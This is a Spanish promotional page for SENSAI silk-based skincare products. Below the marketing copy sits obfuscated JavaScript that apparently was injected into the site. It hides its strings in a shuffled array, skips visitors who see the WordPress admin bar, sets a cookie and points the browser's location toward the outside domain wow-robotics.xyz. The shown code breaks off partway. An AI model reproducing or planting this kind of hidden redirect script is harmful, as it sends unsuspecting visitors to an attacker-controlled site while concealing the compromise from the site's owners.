Una vida de belleza con SENSAI

Todas las personas contamos con una belleza propia, basada en nuestra naturaleza innata y en el estilo de vida que llevamos.

SENSAI respeta esta individualidad, a la vez que realza la belleza propia de cada ser humano. La seda, conocida como ‘segunda piel’ por su suave textura y su modulable permeabilidad, es la fibra más preciada del mundo. Y de entre todas las sedas, la más valorada es una exclusiva variedad originaria de Japón: la seda Koishimaru también conocida como ‘precioso tesoro’.

SENSAI descubrió en esta fibra única un poder especial oculto. De la combinación del valioso secreto de la seda aplicada al cuidado de la piel, surgió SENSAI, creado para revelar la belleza natural de su piel.

SENSAI, adaptándose a las necesidades específicas de todo tipo de piel, le da la bienvenida a una vida de belleza infinita.

 

Puedes adquirir estos productos en nuestra tienda online.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone